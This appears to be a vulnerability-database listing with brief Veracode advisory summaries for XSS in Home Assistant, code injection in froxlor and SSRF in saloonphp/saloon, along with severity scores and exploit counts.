Home Assistant is vulnerable to Cross Site Scripting. The vulnerability is due to the lack of output escaping or sanitization in the History-graph card, where an attacker can inject arbitrary tags that execute JavaScript by changing the name of a sensor to a malicious value...

CVSS 8.8 • AI score 5.9 • EPSS 0.00202
Exploits: 1 • References: 3 • Affected software: 2
Veracode • added 2026/03/28 5:22 a.m.

Arbitrary Code Injection

froxlor/froxlor is vulnerable to Arbitrary Code Injection. The vulnerability is due to improper validation of DNS record content in the DomainZones.add endpoint, which allows an attacker to inject malicious directives into zone files and manipulate DNS configuration...

CVSS 8.8 • AI score 5.9 • EPSS 0.00544
Exploits: 1 • References: 3 • Affected software: 1
Veracode • added 2026/03/28 5:21 a.m.

Server-Side Request Forgery (SSRF)

saloonphp/saloon is vulnerable to Server-Side Request Forgery (SSRF). The vulnerability is due to improper validation of request endpoints allowing absolute URLs to override the base URL, which allows an attacker to redirect requests to malicious hosts and potentially exfiltrate sensitive data such...

CVSS 8.7 • AI score 5.9 • EPSS 0.0042
Exploits: 0 • References: 3 • Affected software: 1
Total number of security vulnerabilities: 38287